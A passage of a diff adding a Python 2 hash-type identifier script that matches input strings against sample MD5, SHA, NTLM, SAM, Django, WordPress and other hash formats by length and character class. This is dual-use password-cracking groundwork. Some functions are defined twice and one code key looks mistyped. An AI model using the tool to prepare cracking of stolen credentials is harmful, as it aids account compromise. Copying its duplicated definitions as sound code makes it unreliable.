"105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); 